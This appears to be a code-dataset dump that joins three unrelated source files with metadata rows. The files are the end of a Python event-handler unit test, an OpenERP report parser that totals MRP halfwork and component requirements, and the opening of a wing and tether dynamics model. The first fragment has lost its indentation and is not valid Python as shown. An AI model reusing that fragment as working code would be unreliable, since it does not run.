# Assert the handler is empty
self.assertEqual(handler.pop_event(), None)
# Send event, with matching properties
for topic in ('/titi/toto', '/toto/', '/titi/42', '/titi/toto/tata'):
value = 42
evt_props = {key: value}
self._run_command("send {0} {1}=42", topic, key, value)
# Check properties
self.assertIn(key, handler.last_props)
self.assertEqual(str(handler.last_props[key]), str(value))
self.assertIsNot(handler.last_props, evt_props)
# Check topic
self.assertEqual(handler.pop_event(), topic)
# Send events, with a non-matching properties
self._run_command("send {0} {1}=21", topic, key)
self.assertEqual(handler.pop_event(), None)
def testPost(self):
"""
Tests the post event method
"""
# Prepare a handler
handler, _ = self._register_handler('/titi/*')
# Post a message
topic = '/titi/toto'
self._run_command("post {0}", topic)
# Wait a little
handler.wait(1)
self.assertEqual(handler.pop_event(), topic)
| apache-2.0 | 4,493,402,563,130,737,000 | 27.738462 | 80 | 0.544254 | false |
Micronaet/micronaet-bom | order_bom_explode_report/report/originali/mrp_status_hw_component_parser.py | 1 | 21833 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2010-2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
# Copyright(c)2008-2010 SIA "KN dati".(http://kndati.lv) All Rights Reserved.
# General contacts <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import xlsxwriter # XLSX export
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.report import report_sxw
from openerp.report.report_sxw import rml_parse
from datetime import datetime, timedelta
from openerp.tools.translate import _
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class Parser(report_sxw.rml_parse):
default_days = 30
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context)
self.localcontext.update({
'get_object': self.get_object,
'get_filter': self.get_filter,
'get_date': self.get_date,
'get_parent_oc_period': self.get_parent_oc_period,
})
def get_parent_oc_period(self, parent):
res = ''
period = self.order_month.get(parent, {})
for date in sorted(period):
res += '[%s %s] ' % (date, period[date])
return res
def get_date(self, ):
        ''' Return the current date in the default server date format.
'''
return datetime.now().strftime(DEFAULT_SERVER_DATE_FORMAT)
def get_filter(self, data):
''' Get filter selected
'''
if data is None:
data = {}
days = data.get('days', self.default_days)
return _('Active production for %s days') % days
def get_object(self, data):
''' Search all mrp elements
'''
# Readability:
cr = self.cr
uid = self.uid
context = {}
user_pool = self.pool.get('res.users')
previous_status = user_pool.set_no_inventory_status(
cr, uid, value=False, context=context)
# ---------------------------------------------------------------------
# Utility:
# ---------------------------------------------------------------------
def log_line(self, line, extra=None, mode='product'):
''' Utility for log in excel file:
'''
if extra is None:
extra = {}
if mode == 'product':
WS = self.WS[mode]
# -------------------------------------------------------------
# Write header:
# -------------------------------------------------------------
if not self.counters[mode]:
counter = self.counters[mode]
header = [
# Reference:
'Parent', 'DB padre', 'Product', 'Order ref.',
# Order quantity:
#'OC') # MA
#'B' # B total
#'Delivery') # BC
# Quantity for accounting:
'Remain to MRP', # OC
'Ready', # B net
'Stock', # Stock
# Calculated data
'TODO',
# Check
'No BOM', 'Negative',
]
header.extend(extra.keys())
col = 0
for h in header:
WS.write(counter, col, h)
col += 1
self.counters[mode] += 1
# -------------------------------------------------------------
# Write data line:
# -------------------------------------------------------------
col = 0
counter = self.counters[mode]
# Write constant data:
for item in line:
WS.write(counter, col, item)
col += 1
# Write extra data:
for k in extra:
WS.write(counter, col, extra[k])
col += 1
self.counters[mode] += 1
elif mode == 'halfwork':
pass
elif mode == 'component':
pass
elif mode == 'mrp':
WS = self.WS[mode]
# -------------------------------------------------------------
# Write header:
# -------------------------------------------------------------
if not self.counters[mode]:
counter = self.counters[mode]
header = [
# Reference:
'MRP', 'OC', 'Code', 'Maked',
]
col = 0
for h in header:
WS.write(counter, col, h)
col += 1
self.counters[mode] += 1
# -------------------------------------------------------------
# Write data line:
# -------------------------------------------------------------
col = 0
counter = self.counters[mode]
# Write constant data:
for item in line:
WS.write(counter, col, item)
col += 1
self.counters[mode] += 1
else:
pass # error
return
# ---------------------------------------------------------------------
# Procedure:
# ---------------------------------------------------------------------
self.order_month = {} # Parent distribution for month
if data is None:
data = {}
# Log part
# TODO change:
filename = '/home/administrator/photo/log/parent_product.xlsx'
WB = xlsxwriter.Workbook(filename)
extra = {
'code_check': '',
'stock_check': '',
}
self.counters = {
'product': 0,
'halfwork': 0,
'component': 0,
'mrp': 0,
}
self.WS = {
'product': WB.add_worksheet(),
'halfwork': WB.add_worksheet(),
'component': WB.add_worksheet(),
'mrp': WB.add_worksheet(),
}
days = data.get('days', self.default_days)
first_supplier_id = data.get('first_supplier_id')
# Create deadline period in report:
with_deadline = data.get('with_deadline', False)
# TODO change used for now!!!!!!
#reference_date = '2016-10-15 00:00:00'
# 04/01/2017 Change after inventory
reference_date = '2017-09-01 00:00:00' # TODO keep in parameter
# TODO manage day range
if days:
limit_date = '%s 23:59:59' % (
datetime.now() + timedelta(days=days)).strftime(
DEFAULT_SERVER_DATE_FORMAT)
else:
limit_date = False
# Pool used:
company_pool = self.pool.get('res.company')
sale_pool = self.pool.get('sale.order')
#sol_pool = self.pool.get('sale.order.line')
mrp_pool = self.pool.get('mrp.production')
_logger.warning('Range period: MRP from %s, Max open MRP <= %s' % (
reference_date, limit_date or 'no limit'))
# ---------------------------------------------------------------------
# To produce line in order open
# ---------------------------------------------------------------------
# Database
parent_todo = {}
stock_used = [] # for product and halfwork
hws = {}
order_ids = company_pool.mrp_domain_sale_order_line(
cr, uid, context=context)
for order in sale_pool.browse(cr, uid, order_ids, context=context):
for line in order.order_line: # order line
# Reset log:
extra['code_check'] = ''
extra['stock_check'] = ''
if line.mx_closed:
continue
product = line.product_id # readability
default_code = product.default_code
if not default_code:
extra['code_check'] = 'no product code'
log_line(self, [
'', '', '', order.name, '', '', '', '', '', '',
], extra)
continue # TODO raise error or log
parent = default_code[:3]
if parent not in parent_todo:
# Stock, Order to produce, has stock negative
parent_todo[parent] = [
False, # 0. Parent bom for explode
0.0, # 1. Stock status net
0.0, # 2. Order to produce # merge with 1?
0, # 3. Stock status negative (total)
0, # 4. No parent bom (total)
0.0, # 5. Produce to delivery
]
# -------------------------------------------------------------
# Populate parent database:
# -------------------------------------------------------------
# Setup parent bom fist time only (and check when not present):
parent_bom = product.parent_bom_id
if parent_bom and not parent_todo[parent][0]:
# only once
parent_todo[parent][0] = parent_bom
else:
if not parent_bom:
# Check no parent
parent_todo[parent][4] += 1
# ---------------------------------------
# Stock check (use stock qty only once!):
# ---------------------------------------
if default_code not in stock_used:
extra['stock_check'] += 'used'
stock_used.append(default_code)
stock_net = product.mx_net_qty
# Check negative stock for highlight:
if stock_net < 0:
parent_todo[parent][3] += 1
parent_todo[parent][1] += stock_net # Net in stock (once)
else:
extra['stock_check'] += 'not used'
stock_net = 0.0 # no used
# ---------------
# Check negative:
# ---------------
# Use utility function:
(oc_remain, not_delivered) = \
company_pool.mrp_order_line_to_produce(line)
parent_todo[parent][2] += oc_remain
parent_todo[parent][5] += not_delivered
# -------------------------------------------------------------
# Populate halfwork database:
# -------------------------------------------------------------
todo = oc_remain # XXX - stock_net + not_delivered
# Log line operation:
log_line(self, [
parent, parent_bom.code or '???', default_code,
order.name, oc_remain, not_delivered, stock_net, todo,
'' if parent_bom else 'X', '' if stock_net >= 0 else 'X',
], extra)
# -------------------------------------------------------------
# Deadline calendar (depend on wizard, section in report):
# -------------------------------------------------------------
if with_deadline and todo:
if parent not in self.order_month:
self.order_month[parent] = {}
if line.date_deadline:
deadline_period = line.date_deadline[2:7]
else:
deadline_period = '??'
if deadline_period in self.order_month[parent]:
self.order_month[parent][deadline_period] += todo
else:
self.order_month[parent][deadline_period] = todo
# -------------------------------------------------------------
# Halfwork from parent BOM
# -------------------------------------------------------------
for hw in parent_bom.bom_line_ids:
halfwork = hw.product_id
if halfwork.relative_type != 'half':
continue
if halfwork not in hws: # halfwork browse obj
hws[halfwork] = [
0.0, # 0. Needed
halfwork.mx_net_qty, # 1. Net (after - MRP) # TODO remove MRP ?
{}, # 2. XXX total component for check double order?
# XXX No OF
]
# Update total TODO * q. in BOM:
hws[halfwork][0] += todo * hw.product_qty
# Save total for this bom (parent and halfwork) = key
# XXX used for not order double pipes?
hws[halfwork][2][
(parent, halfwork)] = hw.product_qty
# ---------------------------------------------------------------------
# Clean HW for unload production:
# ---------------------------------------------------------------------
mrp_ids = mrp_pool.search(cr, uid, [
# State filter:
#('state', '!=', 'cancel'), # not correct !!!
# Period filter (only up not down limit)
('date_planned', '>=', reference_date),
], context=context)
# Generate MRP total component report with totals:
for mrp in mrp_pool.browse(cr, uid, mrp_ids, context=context):
for sol in mrp.order_line_ids:
product = sol.product_id
qty_maked = sol.product_uom_maked_sync_qty
# TODO better use dynamic_bom_line_ids ?
# check existence
# Log product extract as MRP
log_line(self, (
mrp.name, sol.order_id.name, product.default_code,
qty_maked), mode='mrp')
for hw in product.parent_bom_id.bom_line_ids:
halfwork = hw.product_id
if halfwork.relative_type != 'half':
continue # Not used in this report
if halfwork not in hws:
continue # TODO Raise error not in bom?
hw_q = qty_maked * hw.product_qty
hws[halfwork][1] -= hw_q # - MRP # TODO check same problem
# TODO check if is bouble - MRP!!!
# ---------------------------------------------------------------------
# Prepare report:
# ---------------------------------------------------------------------
res = []
# Empty record
empty_A = ['' for n in range(0, 7)] # parent 7
empty_B = ['' for n in range(0, 6)] # halfwork 6
empty_C = ['' for n in range(0, 7)] # component 7
hw_present = [] # for highlight only first total in report (for orders)
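        # Each report row is the concatenation of block A (parent order data,
        # 7 columns), block B (halfwork data, 6 columns) and block C (component
        # data, 7 columns); the empty_* lists pad a row whenever a block is
        # missing or has already been printed for that parent/halfwork.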
for parent in sorted(parent_todo):
record = parent_todo[parent]
# -----------------------------------------------------------------
# BLOCK A:
# -----------------------------------------------------------------
# Parent data:
data_A = [
parent, # 0. Code
record[2], # 1. OC
record[1], # 2. Mag (Net stock - MRP calculated)
record[5], # 3. Produced to delivery
record[2], # XXX ex.: - record[1] + record[5], # 4. todo
record[3], # 5. tot. negative stock (for green-red light)
record[4], # 6. tot. no bom (for green-red light)
# TODO
]
if not record[0]: # parent bom present:
res.append(data_A + empty_B + empty_C)
continue
parent_first = True
for hw in record[0].bom_line_ids:
if not hw.product_id or hw.product_id.id in hw_present:
yet_write = True # yet write in report before
else:
hw_present.append(hw.product_id.id)
yet_write = False # yet write in report before
if not hw.product_id in hws: # hw in the list selection
continue # not in selected list create before
if parent_first:
parent_first = False
else:
data_A = empty_A # reset A
# -------------------------------------------------------------
# BLOCK B:
# -------------------------------------------------------------
halfwork = hw.product_id # readability
hw_data = hws.get(halfwork, False)
if not hw_data:
res.append(data_A + empty_B + empty_C)
continue
proposed_hw = hw_data[0] - hw_data[1]
data_B = [
hw_data[2].get(
(parent, halfwork), '?'), # total
halfwork.default_code, # hw code
hw_data[0], # Todo halfwork
hw_data[1], # Stock
proposed_hw,
yet_write, # yet write status
]
hw_first = True
for cmpt in halfwork.half_bom_ids:
if hw_first:
hw_first = False
data_AB = data_A + data_B
else:
data_AB = data_A + empty_B
# ---------------------------------------------------------
# BLOCK C:
# ---------------------------------------------------------
cmpt_net = cmpt.product_id.mx_net_qty
cmpt_of = cmpt.product_id.mx_of_in
proposed = \
proposed_hw * cmpt.product_qty - cmpt_net - cmpt_of
# Add data block directly:
res.append(data_AB + [
cmpt.product_qty, # total
cmpt.product_id.default_code, # code
proposed_hw * cmpt.product_qty,
cmpt_net,
cmpt_of,
proposed if proposed > 0.0 else '',
proposed if proposed <= 0.0 else '',
])
if hw_first: # no cmpt data (not in loop)
res.append(data_A + data_B + empty_C)
user_pool.set_no_inventory_status(
cr, uid, value=previous_status, context=context)
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,514,814,840,149,318,000 | 41.809804 | 95 | 0.373609 | false |
google/makani | analysis/control/dynamics.py | 1 | 28331 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python dynamics helpers.
Provides a simplified control-oriented model of the wing and tether.
"""
import collections
import copy
from makani.analysis.control import actuator_util
from makani.analysis.control import catenary
from makani.analysis.control import geometry
from makani.analysis.control import type_util
from makani.control import control_types
from makani.control import system_types
from makani.sim.physics import physics
import numpy as np
# Structure storing a force, moment, and position at which that force
# is applied.
ForceMomentPos = collections.namedtuple('ForceMomentPos',
['force', 'moment', 'pos'])
# Structure for storing forces and moment.
ForceMoment = collections.namedtuple('ForceMoment', ['force', 'moment'])
# Structure representing the inputs to the wing.
# thrust: Motor thrust [N] (1-by-1 np.matrix).
# motor_moment: Motor moments [N-m] (3-by-1 np.matrix).
# flaps: Flaps [rad] (kNumFlaps-by-1 np.matrix).
# wind_g: Wind speed [m/s] in ground coordinates (3-by-1 np.matrix).
WingInputs = type_util.MakeNamedVectorClass( # pylint: disable=invalid-name
'WingInputs', [('thrust', range(0, 1)),
('motor_moment', range(1, 4)),
('flaps', range(4, 4 + system_types.kNumFlaps)),
('wind_g', range(4 + system_types.kNumFlaps,
7 + system_types.kNumFlaps))])
class WingState(type_util.MakeStateClass(
'WingState', [('omega_b', range(0, 3)),
('dcm_g2b', range(3, 6)),
('wing_vel_g', range(6, 9)),
('wing_pos_g', range(9, 12))])):
"""Class representing the state of the wing.
Attributes:
omega_b: Body angular rates.
dcm_g2b: Ground to body rotation DCM. Increments in the DCM are represented
by an Euler vector.
wing_vel_g: Velocity of the wing in ground coordinates.
wing_pos_g: Position of the wing in ground coordinates.
"""
def Increment(self, tangent, step=1.0):
"""Return a state evolved from this state along a tangent direction.
Args:
tangent: A WingState.Tangent along which to move.
step: A scaling of how far to move.
Returns:
A new WingState.
"""
return WingState(omega_b=self.omega_b + step * tangent.domega_b,
dcm_g2b=(geometry.AxisToDcm(step * tangent.ddcm_g2b)
* self.dcm_g2b),
wing_vel_g=self.wing_vel_g + step * tangent.dwing_vel_g,
wing_pos_g=self.wing_pos_g + step * tangent.dwing_pos_g)
def Difference(self, other_state):
"""Inverse operation of Increment with a step size of 1.0."""
return WingState.Tangent(
domega_b=other_state.omega_b - self.omega_b,
ddcm_g2b=geometry.DcmToAxis(other_state.dcm_g2b * self.dcm_g2b.T),
dwing_vel_g=other_state.wing_vel_g - self.wing_vel_g,
dwing_pos_g=other_state.wing_pos_g - self.wing_pos_g)
@type_util.RequireMatrixArguments(None, (3, 1))
def CalcAerodynamicAngles(self, wind_g):
"""Calculates (v_rel, alpha, beta) from the current wing state.
Args:
wind_g: A 3-by-1 matrix storing the wind in g coordinates.
Returns:
A tuple (v_rel, alpha, beta).
"""
return geometry.VelocitiesToAerodynamicAngles(
self.dcm_g2b, self.wing_vel_g, wind_g)
@type_util.RequireMatrixArguments((3, 1), (3, 2), None, None)
def _CalcBridleKnotPos(tether_force_b, bridle_pos, bridle_y_offset,
bridle_radius):
"""Calculate the bridle knot position in body coordinates."""
if np.linalg.norm(tether_force_b) == 0.0:
tether_force_b = np.matrix([[0.0], [0.0], [1.0]])
# Calculate the knot point location. Here we use a bridle
# coordinate system with its origin at the bridle pivot, its
# y-axis pointing toward the starboard bridle point and its z-axis
# pointed at the knot.
bridle_coord_y = bridle_pos[:, 1] - bridle_pos[:, 0]
bridle_coord_y /= np.linalg.norm(bridle_coord_y)
bridle_coord_z = copy.copy(tether_force_b)
bridle_coord_z -= bridle_coord_y * (np.transpose(bridle_coord_y)
* tether_force_b)
bridle_coord_z /= np.linalg.norm(bridle_coord_z)
bridle_coord_origin = (bridle_pos[:, 1] + bridle_pos[:, 0]) * 0.5
bridle_coord_origin[1] += bridle_y_offset
return bridle_coord_origin + bridle_coord_z * bridle_radius
class MotorModel(object):
# pylint: disable=unused-argument
def CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment_r):
raise NotImplementedError()
class PureForceMomentMotorModel(MotorModel):
def __init__(self, rotor_params, pos_com_b):
self._dcm_r2b = geometry.AngleToDcm(
0.0, np.arctan2(rotor_params[0]['axis'][2],
rotor_params[0]['axis'][0]), 0.0)
self._pos_com_b = np.matrix(pos_com_b).T
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1), (1, 1),
(3, 1))
def CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment_r):
# NOTE: This neglects motor reaction torques, and assumes that
# MixRotors cancels the non-zero torque about the center-of-mass
# that results from pure thrusting.
motor_force_r = np.matrix([[thrust[0, 0]], [0.0], [0.0]])
return ForceMomentPos(
self._dcm_r2b * motor_force_r, self._dcm_r2b * motor_moment_r,
self._pos_com_b)
class MotorMixerMotorModel(MotorModel):
"""Model the commanded thrust and moment by calling MixRotors."""
def __init__(self, rotor_databases, air_density, weights, rotor_params,
rotor_control_params, hover_flight_mode=False):
self._dcm_r2b = geometry.AngleToDcm(
0.0, np.arctan2(rotor_params[0]['axis'][2],
rotor_params[0]['axis'][0]), 0.0)
self._rotor_databases = rotor_databases
self._air_density = air_density
self._weights = weights
self._rotor_params = rotor_params
self._rotor_control_params = rotor_control_params
self._hover_flight_mode = hover_flight_mode
@type_util.RequireMatrixArguments(None, None, (3, 1), (1, 1), (3, 1))
def CalcRotorSpeeds(self, v_rel, omega_b, thrust, motor_moment_r):
thrust_moment = {
'thrust': thrust[0, 0],
'moment': [motor_moment_r[i, 0] for i in range(3)]
}
return actuator_util.MixRotors(
thrust_moment, self._weights, v_rel, [omega_b[i, 0] for i in range(3)],
control_types.kStackingStateNormal, self._hover_flight_mode,
self._air_density, self._rotor_params, self._rotor_control_params)
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1), (1, 1),
(3, 1))
def CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment_r):
rotor_speeds = self.CalcRotorSpeeds(v_rel, omega_b, thrust, motor_moment_r)
total_force = np.matrix(np.zeros((3, 1)))
total_moment = np.matrix(np.zeros((3, 1)))
v_rel_b = geometry.AerodynamicAnglesToRelativeVelocity(v_rel, alpha, beta)
for i in range(rotor_speeds.shape[0]):
rotor_speed = rotor_speeds[i, 0]
if self._rotor_params[i]['dir'] == system_types.kPositiveX:
direction = 1.0
else:
direction = -1.0
rotor_velocity = direction * rotor_speed
rotor_pos_b = np.matrix(self._rotor_params[i]['pos']).T
v_freestream = np.dot(
self._dcm_r2b[:, 0].T, v_rel_b + np.cross(omega_b.T, rotor_pos_b.T).T)
v_freestream *= (1.0 - self._rotor_params[i]['local_pressure_coeff'])**0.5
rotor_thrust = self._rotor_databases[i].CalcThrust(
rotor_speed, v_freestream[0, 0], self._air_density)
rotor_torque = direction * self._rotor_databases[i].CalcTorque(
rotor_speed, v_freestream[0, 0], self._air_density)
motor_force_b = self._dcm_r2b * np.matrix([[rotor_thrust], [0.0], [0.0]])
lever_arm_moment_b = np.cross(
rotor_pos_b.T, motor_force_b.T).T
aero_moment_b = self._dcm_r2b * np.matrix([[rotor_torque], [0.0], [0.0]])
gyro_moment_b = np.cross(
self._rotor_params[i]['I'] * rotor_velocity * self._dcm_r2b[:, 0].T,
omega_b.T).T
total_force += motor_force_b
total_moment += lever_arm_moment_b + aero_moment_b + gyro_moment_b
return ForceMomentPos(
total_force, total_moment, np.matrix(np.zeros((3, 1))))
class TetherForceModel(object):
# pylint: disable=unused-argument
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
raise NotImplementedError()
class ConstantTetherForceModel(TetherForceModel):
"""Simple model of tether force as constant in ground coordinates."""
def __init__(self, force_g):
self.SetForce(force_g)
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
"""Calculate the tether force in body coordinates.
Args:
dcm_g2b: DCM rotating ground to body coordinates (3-by-3 np.matrix).
      wing_pos_g: Wing position [m] in ground coordinates (unused
3-by-1 np.matrix).
wing_vel_g: Wing velocity [m/s] in ground coordinates (unused
3-by-1 np.matrix).
wind_g: Wind velocity [m/s] in ground coordinates (unused 3-by-1
np.matrix).
Returns:
A 3-by-1 np.matrix storing the tether force in body coordinates.
"""
return dcm_g2b * self._force_g
@type_util.RequireMatrixArguments(None, (3, 1))
def SetForce(self, force_g):
"""Update the force vector.
Args:
force_g: New tether force in ground coordinates.
"""
self._force_g = copy.copy(force_g)
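# Usage sketch for the model above (illustrative values, not actual system
# parameters): a constant 10 kN force along +z in ground coordinates, expressed
# in body coordinates for an identity attitude.
def _ExampleConstantTetherForce():
  model = ConstantTetherForceModel(np.matrix([[0.0], [0.0], [1.0e4]]))
  zero3 = np.matrix(np.zeros((3, 1)))
  return model.CalcBodyForce(np.matrix(np.eye(3)), zero3, zero3, zero3)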
class SimpleSpringTetherForceModel(TetherForceModel):
"""Model of tether force as a simple spring, including bridle interactions."""
def __init__(self, spring_const, system_params):
tether_params = system_params['tether']
wing_params = system_params['wing']
self._spring_const = spring_const
self._tether_length = tether_params['length']
self._tether_drag_area = (0.25 * tether_params['section_drag_coeff']
* tether_params['length']
* tether_params['outer_diameter'])
self._air_density = system_params['phys']['rho']
self._bridle_pos = np.matrix(wing_params['bridle_pos']).T
self._bridle_y_offset = wing_params['bridle_y_offset']
self._bridle_radius = wing_params['bridle_rad']
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
"""Calculate the tether force in body coordinates.
Args:
dcm_g2b: DCM rotating ground to body coordinates (3-by-3 np.matrix).
      wing_pos_g: Wing position [m] in ground coordinates (3-by-1 np.matrix).
wing_vel_g: Wing velocity [m/s] in ground coordinates (3-by-1 np.matrix).
wind_g: Wind velocity [m/s] in ground coordinates (3-by-1 np.matrix).
Returns:
A 3-by-1 np.matrix storing the tether force in body coordinates.
"""
# This intentionally ignores the small offset from the GSG
# position for simplicity.
bridle_knot_b = _CalcBridleKnotPos(dcm_g2b * -wing_pos_g,
self._bridle_pos,
self._bridle_y_offset,
self._bridle_radius)
bridle_knot_g = wing_pos_g + dcm_g2b.T * bridle_knot_b
tension = self._spring_const * (np.linalg.norm(bridle_knot_g)
- self._tether_length)
spring_force_g = -tension * bridle_knot_g / np.linalg.norm(bridle_knot_g)
airspeed = np.linalg.norm(wing_vel_g - wind_g)
drag = 0.5 * self._air_density * airspeed**2.0 * self._tether_drag_area
drag_force_g = drag * (wind_g - wing_vel_g) / max(airspeed, 0.1)
return dcm_g2b * (spring_force_g + drag_force_g)
class CatenaryTetherForceModel(TetherForceModel):
"""Model of tether force using catenary tension and rigid-rod drag."""
def __init__(self, tether_params, gsg_pos_g, bridle_radius, g, air_density):
"""Create a catenary tether force model.
Args:
tether_params: TetherParams dictionary.
gsg_pos_g: Position [m] of the GSG in the g-frame.
bridle_radius: Bridle radius [m] of the kite.
g: Gravitational acceleration [m/s^2].
air_density: Air density [kg/m^3].
"""
self._gsg_pos_g = np.matrix(np.reshape(gsg_pos_g, (3, 1)))
self._length = tether_params['length'] + bridle_radius
self._weight = tether_params['length'] * tether_params['linear_density'] * g
self._section_drag_coeff = tether_params['section_drag_coeff']
self._outer_diameter = tether_params['outer_diameter']
self._air_density = air_density
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
"""Calculate the tether force in body coordinates.
Args:
dcm_g2b: DCM rotating ground to body coordinates (3-by-3 np.matrix).
      wing_pos_g: Wing position [m] in ground coordinates (3-by-1 np.matrix).
wing_vel_g: Wing velocity [m/s] in ground coordinates (3-by-1 np.matrix).
wind_g: Wind velocity [m/s] in ground coordinates (unused 3-by-1
np.matrix).
Returns:
A 3-by-1 np.matrix storing the tether force in body coordinates.
"""
# Calculate catenary tension.
horizontal_distance = (wing_pos_g[0, 0]**2.0 + wing_pos_g[1, 0]**2.0)**0.5
vertical_distance = self._gsg_pos_g[2, 0] - wing_pos_g[2, 0]
(h, v) = catenary.DimensionlessTensionsFromPoint(
horizontal_distance / self._length,
vertical_distance / self._length)
azi = np.arctan2(wing_pos_g[1, 0], wing_pos_g[0, 0])
tension_g = self._weight * np.matrix(
[[-h * np.cos(azi)], [-h * np.sin(azi)], [v]])
# Calculate drag reaction force on the wing. This is calculated by modeling
# the tether as a rigid rod that is pinned at the GSG and rotating at fixed
# angular velocity.
#
# Let
# CD = cross-sectional drag coefficient
# s = diameter of the rod
# L = length of rod
# V = velocity of the free end of the rod
# rho = air density
# The drag dD along a segment of the rod with length dx at distance x from
# the fixed end is
# dD(x) = 1/2 * rho * v(x)^2 * CD * s * dx.
# Therefore,
# dD/dx = 1/2 * rho * v(x)^2 * CD * s.
# The velocity of the segment is v(x) = x/L * V, so
# dD/dx = 1/2 * rho * x^2 / L^2 * V^2 * CD * s
# From this, we obtain the differential moment about the fixed end:
# dM/dx = x * dD/dx = 1/2 * rho * x^3 / L^2 * V^2 * CD * s.
# Integrating from x=0 to x=L yields the total moment due to drag,
# M = 1/8 * rho * L^2 * V^2 * CD * s.
# Force at the fixed end induces no moment, so the drag moment must be
# entirely balanced by a reaction force at the free end (i.e. the kite).
# The magnitude of this force, R, is
# R = M / L = 1/8 * rho * L * V^2 * CD * s.
#
# Here, we treat the rod as extending from the GSG to the body frame origin,
# and we use the wing velocity normal to the rod to determine V.
gsg_to_wing_g = wing_pos_g - self._gsg_pos_g
gsg_to_wing_dir_g = gsg_to_wing_g / np.linalg.norm(gsg_to_wing_g)
normal_vel_g = (wing_vel_g
- float(wing_vel_g.T * gsg_to_wing_dir_g)
* gsg_to_wing_dir_g)
normal_vel_mag = np.linalg.norm(normal_vel_g)
drag_direction_g = -normal_vel_g / normal_vel_mag
drag_g = (1.0 / 8.0 * self._air_density * np.linalg.norm(gsg_to_wing_g)
* normal_vel_mag**2.0 * self._section_drag_coeff
* self._outer_diameter * drag_direction_g)
return dcm_g2b * (tension_g + drag_g)
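# Quick numeric check of the rigid-rod drag reaction derived in the comment
# above, R = 1/8 * rho * L * V^2 * CD * s.  The values are illustrative
# assumptions, not actual system parameters: rho = 1.2 kg/m^3, L = 440 m,
# V = 60 m/s, CD = 1.0, s = 0.03 m gives R of roughly 7.1e3 N.
def _ExampleRodDragReaction(rho=1.2, length=440.0, v_normal=60.0,
                            drag_coeff=1.0, diameter=0.03):
  return 0.125 * rho * length * v_normal**2.0 * drag_coeff * diameter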
class SwigAeroModel(object):
"""Swig import of the simulator aerodynamics model."""
def __init__(self):
self._aero = physics.Aero(physics.GetAeroSimParams())
@type_util.RequireMatrixArguments(None, None, None, None,
(system_types.kNumFlaps, 1), (3, 1),
None)
def CalcFMCoeff(self, alpha, beta, reynolds_number, flaps, omega_hat,
thrust_coeff):
"""Calculates force and moment coefficients from the Swig database."""
omega_hat_vec3 = physics.Vec3()
omega_hat_vec3.x = omega_hat[0, 0]
omega_hat_vec3.y = omega_hat[1, 0]
omega_hat_vec3.z = omega_hat[2, 0]
flaps_vec = physics.VecWrapper(system_types.kNumFlaps)
for i in range(system_types.kNumFlaps):
flaps_vec.SetValue(i, flaps[i, 0])
force_moment = physics.ForceMoment()
self._aero.CalcForceMomentCoeff(alpha, beta, omega_hat_vec3.this,
flaps_vec.GetVec(), reynolds_number,
force_moment.this, thrust_coeff)
force_moment_coeff = (np.matrix([[force_moment.force.x],
[force_moment.force.y],
[force_moment.force.z]]),
np.matrix([[force_moment.moment.x],
[force_moment.moment.y],
[force_moment.moment.z]]))
return force_moment_coeff
class Wing(object):
"""Simplified model of the wing for control design.
The Wing class stores parameters defined by the environment (air
density, gravitational constant), a stateless tether force model,
a stateless aerodynamic model, and a nominal orientation.
It provides functions for calculating the ODEs that govern a 6-DOF
rigid body model.
"""
def __init__(self, system_params, sim_params, aero_model, motor_model,
tether_force_model):
"""Constructs a Wing model.
Args:
system_params: A system parameters structure from mconfig.
sim_params: A simulator parameters structure from mconfig.
aero_model: A Python class implementing a function CalcFMCoeff. See
SwigAeroModel in this module as an example.
motor_model: A MotorModel.
tether_force_model: A TetherForceModel.
"""
self._wing_area = system_params['wing']['A']
self._wing_span = system_params['wing']['b']
self._wing_chord = system_params['wing']['c']
self._wing_mass = system_params['wing']['m']
self._wing_inertia_matrix = np.matrix(system_params['wing']['I']['d'])
self._pos_com_b = np.matrix(system_params['wing']['center_of_mass_pos']).T
# Bridle parameters.
self._bridle_pos = np.matrix(system_params['wing']['bridle_pos']).T
self._bridle_y_offset = system_params['wing']['bridle_y_offset']
self._bridle_radius = system_params['wing']['bridle_rad']
# Physics parameters.
